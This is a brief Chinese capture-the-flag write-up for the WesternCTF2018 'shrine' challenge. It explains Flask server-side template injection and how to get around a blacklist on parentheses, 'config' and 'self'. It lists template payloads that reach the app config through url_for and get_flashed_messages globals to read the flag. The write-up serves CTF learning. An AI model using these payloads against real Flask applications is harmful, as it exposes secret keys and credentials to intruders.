[WesternCTF2018]shrine
[WesternCTF2018]shrine
考点
Flask SSTI获取config信息
Flask SSTI bypass
wp
直接给了代码
访问 /shrine/
是 404,访问 /shrine/{{7*7}}
可以发现存在 SSTI 漏洞,在代码中过滤了 (, ), config, self
,并且说明了 flag
在 config
中,可以读取 app.config['FLAG']
或者 os.environ.pop('FLAG')
这里的黑名单就锁死了 __subclasses__()
以及 config
和 self.__dict__
小结
Flask SSTI获取config除了
{{config}}
,还有{{url_for.__globals__['current_app'].config['FLAG']}}
和{{get_flashed_messages.__globals__['current_app'].config['FLAG']}}
最后更新于